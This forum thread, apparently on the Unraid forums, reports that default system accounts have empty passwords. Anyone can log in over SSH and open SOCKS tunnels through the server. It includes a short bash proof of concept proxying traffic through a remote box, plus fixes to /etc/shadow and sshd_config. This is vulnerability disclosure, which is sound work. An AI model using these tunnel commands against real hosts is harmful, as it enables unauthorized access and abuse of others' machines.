June 20, 20206 yr Hello guys, I couldn't find any proper channels for announcing vulnerabilities, so i think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them. Upon looking at some logs I noticed: ```sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2``` Then after i took a close look at /etc/shadow I noticed almost all users don't have passwords. While they can't actually execute commands on the system, they can see information about the system: ``` $ ssh unraid -l news Linux 4.19.107-Unraid. Could not chdir to home directory /usr/lib/news: No such file or directory Connection to unraid closed. $ ``` But most troublesome, and maybe you guys are not aware of this, but in order to open an ssh tunnel you don't need an actual shell. ``` $ ssh -D 3129 -f -C -q -N lp@unraid $ netstat -plan | grep 3129 tcp 0 0 127.0.0.1:3129 0.0.0.0:* LISTEN 1658854/ssh ``` Voila! then you have an ssh tunnel opened. For now I patched my box, but of course it won't survive the reboot. An easy fix would be: `sed -i -e 's/::1/:!!:1/g' /etc/shadow` Cheerio, Mihai
June 20, 20206 yr Author Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind ) ``` [root@taicasimaica ~]# curl -ks4 showip.net 124.122.71.51 [root@taicasimaica ~]# ssh -D 3129 -f -C -q -N [email protected] -p 7127 The authenticity of host '[x.ninja]:7127 ([91.82.91.172]:7127)' can't be established. ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes [root@taicasimaica ~]# export http_proxy=socks5://127.0.0.1:3129 [root@taicasimaica ~]# curl -ks4 showip.net 91.82.91.172 [root@taicasimaica ~]# ```
June 21, 20206 yr 21 hours ago, Mihai said: An easy fix would be: Would it be better to change this line in /etc/ssh/sshd_config PermitEmptyPasswords yes to PermitEmptyPasswords no
June 21, 20206 yr Or.. how about if we add this to sshd_config: AllowTcpForwarding no Match Group root AllowTcpForwarding yes Then only 'root' user can set up forwarding.
June 21, 20206 yr Author I would use these sshd configurations + setting the users disabled. I don't think having users with empty passwords is a good idea. Thanks for the fast reply!
Archived
This topic is now archived and is closed to further replies.